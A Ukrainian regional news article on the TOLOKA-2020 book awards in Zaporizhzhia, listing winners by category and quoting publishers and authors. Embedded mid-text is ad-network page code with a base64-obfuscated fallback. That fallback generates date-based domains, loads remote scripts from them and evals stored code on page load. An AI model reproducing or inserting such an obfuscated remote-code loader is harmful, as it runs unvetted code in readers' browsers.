Запорізька «TOLOKA-2020» оголосила переможців книжкової премії

Учора, 15 серпня, стали відомі переможці премії «Найкраща книжка Толоки».

Найкращою книгою фестивалю TOLOKA стала збірка білоруської письменниці Вальжини Морт «Епідемія троянд» (видавництво «Люта справа»).

«Епідемія троянд» — це іронічна, моторошна, інтелектуальна та зворушлива поезія.

Сергій Жадан: «Дивовижна книга про наш час і про нашу пам’ять. Книга, під якою можуть підписатись усі, хто далі намагається говорити своєю мовою, у часи, коли вже ніхто нікого не слухає. Книга про те, як знаходити втрачене й цінувати віднайдене. Дуже вчасна книга. Особливо для нас».

Переможці конкурсу: у номінації «Дитяча література» — книга-подорож «Міста України» Мар’яни Гордієнко (видавництво «Ранок»);у номінації «Підліткова література» — «Ательє чаклунських капелюхів» Камоме Шірахама (видавництво «Наша ідея»);у номінації «Українська художня література. Проза» — книга Артемія Кірсанова та Сергія Дзюби «Заборонений: історія життя і боротьби Василя Стуса» (видавництво «Фабула»);у номінації «Українська художня література. Поезія» — «Котлети з ведмедя» Юрка Космини (видавництво «Люта справа»);у номінації «Есеїстика, публіцистика, мемуаристика, література факту» — «Вигнані на степи» Романа Кабачія (видавництво «Люта справа»);у номінації «Переклади іноземної художньої літератури» — книга Енн Тайлер «Турист мимоволі» (видавництво «Фабула»). Лауреати конкурсу: у номінації «Дитяча література» — Світлана Тараторіна, Наталя Левицька «Оця Марія звірів малювала» та «Щоденники вишеньки. Том 2. Таємнича книга» (видавництво «Наша ідея»);у номінації «Підліткова література» — «Слова на стінах» Джулії Волтон (видавництво «Ранок») і «Таємне товариство блазнів» Лесі Ворониної (видавництво «Знання»);у номінації «Українська художня література. Проза» — «Ангелы на песке» Горький Лук (видавництво «Люта справа») та «Мені байдуже, що люди скажуть» Тетяни Цой (видавництво «Білка»);у номінації «Українська художня література. Поезія» — «Люди у пошуках щастя» Артема Полежаки (видавництво «Люта справа»);у номінації «Українська художня література» — «Література Запорізького краю: Хрестоматія творів кінця ХХ – початку ХХІ століття» (видавництво «Дике Поле»);у номінації «Переклади іноземної художньої літератури» — «Голограма для короля» Дейва Еґґерса (видавництво «Фабула»);у номінації «Мистецька література» — фотокнига Марка Милова «За місцем проживання» (видавництво «Герда») та «Дивний світ» Олексія Хомича, Геннадія Меламеда (видавництво «Ранок»);у номінації «Есеїстика, публіцистика, мемуаристика, література факту» — «Чорнобиль: етюди з натури» Олега Векленко (видавництво «Фабула») та «Синагоги Екатеринослава» (видавництво «Герда»); у номінації «Спеціальна відзнака членів журі» — книга Василя Стуса «Листи до сина» (видавництво «Ранок») та «Озеро загадок» Марюса Марцинкявічюса (видавництво «Знання»).

Нагороду отримала книга «Література Запорізького краю: Хрестоматія творів кінця ХХ – початку ХХІ століття». До книги входять літературознавчі нариси творчості 38 письменників Запорізького краю часів незалежної України і їхні найкращі твори. Ця книга стане у пригоді як для викладачів, так і для студентів. А також для тих, хто цікавиться запорізьким письменництвом, — розповів журналістам «Акценту» директор, головний редактор видавництва «Дике Поле» Олександр Лазутін.

Спеціальна премія «Інший погляд/погляд Іншого»

«За гармонійне єднання вербального і візуального, глибинно-поетичне осмислення буття» премією нагородили запорізьке видавництво «Дике Поле» за книгу-альбом «Прозора межа мови». Книга була створена у співавторстві фотохудожника Сергія Лаврова та поета Олександра Медка.

Видавництво «Дике Поле»

Я пишаюсь тим, що ми отримали премію за книгу «Прозора межа мови». Адже це синтез поглядів двох творчих людей. Одна людина дивиться на світ очима фотографа, а інша — очима поета. Але їхні світогляди об’єдналися. Працюючи над цією книгою, ми шукали злиття думок. Я вважаю, що нам це вдалося. Неквапливий читач цієї книги, коли почне думати над віршами в японському стилі Олександра Медка, відразу відчує всю красу природи у світлинах Сергія Лаврова, — поділився власними думками директор, головний редактор видавництва «Дике Поле» Олександр Лазутін. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

У перший день фестивалю було небагато людей, а ось у вихідний вже значно більше. Молодь здебільшого цікавить нон-фікшн і сучасні українські автори, а люди у віці шукають російськомовну літературу, — розповіла PR-менеджерка видавництва «Фабула» Анастасія.

Видавництво «Фабула» Нон-фікшн «Чорнобиль: етюди з натури»

Це книга спогадів учасника ліквідації наслідків аварії на Чорнобильській АЕС Олега Векленка. Від неї неможливо відірватися, адже автор розповідає про повсякденне життя ліквідаторів, про примітивні засоби захисту, про всю небезпеку, яка оточувала їх кожну секунду. Крім того, щирі історії доповнені авторськими малюнками та фотографіями, — поділилася своїми міркуваннями PR-менеджерка видавництва «Фабула» Анастасія.

Видавництво «Бук-Друк»

Я пишу дитячі книги. Уже два роки співпрацюю з житомирським видавництвом «Бук-Друк». Часто беру участь у схожих фестивалях. Вже встиг помітити, що на запорізькій Толоці більшість людей приходять не за книгами, а просто прогулюються поряд. Мої вірші реалістично-пізнавальні про світ природи. Саме так, як все виглядає по-справжньому в природі, а не в казковій формі. Крім усього іншого, всередині деяких книг є розмальовки, щоб дітки могли вивчати навколишній світ , розповів учасник фестивалю, автор дитячих казок Микола Пазюра.

У Запоріжжі я вперше. У мене, до речі, предок був писарем у самого Сірка. Пишу романи з легкою містикою та висвітлюю складну жіночу долю. Я навіть не усвідомлюю коли пишу, просто переключаюся з реальності. Я написала роман, і навіть не можу сказати про що, а коли починаю редагувати, тільки тоді розумію сюжет, і розумію про що він. На жаль, зараз ми живемо у чоловічому суспільстві. Споконвіку жінка була не лише берегинею роду, а й майстринею на всі руки та воїном. Я хочу аби жінки зрозуміли свою цінність та поважали себе, — розповіла письменниця Євдокія Макаренко.

Концерти, поетичні батли, вистави, читання, дискусії, презентації, кіноперегляди та діджей-вечірки чекають на Запоріжжя до 23 серпня.

Нагадаємо, цього року фестиваль «TOLOKA-2020» відбувається одразу на декількох локаціях:

каскад фонтанів «Райдуга»;площа та проспект Маяковського;Запорізький обласний центр молоді;платформа «Дві вежі».

Ознайомитися із загальною програмою та змінами фестивалю можна на сторінці у Facebook. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/zaporizka-toloka-2020-ogolosila-peremozhtsiv-knizhkovoyi-premiyi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top